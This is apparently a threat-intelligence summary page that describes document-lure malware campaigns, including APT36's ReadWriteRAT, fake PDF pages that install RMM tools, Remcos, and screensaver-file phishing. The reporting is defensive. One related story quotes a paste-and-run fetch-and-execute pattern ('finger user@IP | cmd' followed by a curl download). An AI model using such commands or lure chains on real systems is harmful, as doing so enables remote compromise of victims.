Weaponized Document Lures Used to Deliver Malware and Remote Access
Multiple reports describe threat actors using document-themed lures to deliver malicious payloads while evading user scrutiny and defensive controls. ASEC-reported activity shows weaponized PDF files distributed via phishing (e.g., “Invoice,” “Payment”) that display a decoy image or a “Failed to load PDF document” error to push victims to click through to fake Google Drive/Adobe pages, ultimately installing legitimate RMM tools (e.g., Syncro, SuperOps, NinjaOne, ConnectWise ScreenConnect) signed with a valid certificate to blend in as administrative software rather than obvious malware.
Separately, research on APT36 / Transparent Tribe details a targeted espionage operation against Indian government, academic, and strategic entities using spear-phishing ZIP attachments containing oversized LNK files masquerading as PDFs; execution chains leverage mshta.exe to retrieve remote HTA content, decrypt and reconstruct payloads in memory, and deploy a RAT (tracked as ReadWriteRAT) with capabilities including encrypted C2, remote command execution, screenshot capture, clipboard access, and data theft. Other items in the set cover unrelated threats—WordPress SEO cloaking that selectively serves malicious content to verified Googlebot IP ranges, a vendor blog overview of Medusa ransomware activity, and reporting on CrazyHunter ransomware impacting Taiwan healthcare—indicating the commonality here is document/SEO deception techniques, not a single unified incident.
Related Entities
Sources
Related Stories
Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware
Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
1 months ago
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
1 months ago
Spearphishing Campaigns Abuse PDF and Windows Screensaver Files to Install Legitimate RMM Tools
Threat actors have been observed using spearphishing lures and *non-traditional* attachment types—particularly Windows screensaver (`.scr`) executables—to trick users into running code that silently installs legitimate **remote monitoring and management (RMM)** agents (e.g., **SimpleHelp**). ReliaQuest research described business-themed filenames (e.g., `InvoiceDetails.scr`, `ProjectSummary.scr`) delivered via links hosted on legitimate cloud services (e.g., GoFile), with the `.scr` format helping bypass controls that don’t treat screensavers as executables. Once installed, the RMM tooling provides interactive remote access that can enable data theft, lateral movement, and follow-on payload deployment, including ransomware, while blending into normal IT administration traffic. Separately, researchers also reported a spam operation using **fake PDF attachments** that display an error message and redirect victims to a lookalike *Adobe Acrobat* download flow, but instead installs trusted, digitally signed RMM software to establish persistent access. A different phishing campaign used a multi-stage **PDF chain** hosted on reputable infrastructure (e.g., **Vercel Blob**) to redirect victims to a credential-harvesting page and exfiltrate stolen data via a **Telegram bot**, emphasizing how attackers are increasingly abusing high-reputation cloud platforms and document-based lures to evade email and web filtering (including scenarios where the initial email contains no malicious link and can pass SPF/DKIM/DMARC checks).
1 months ago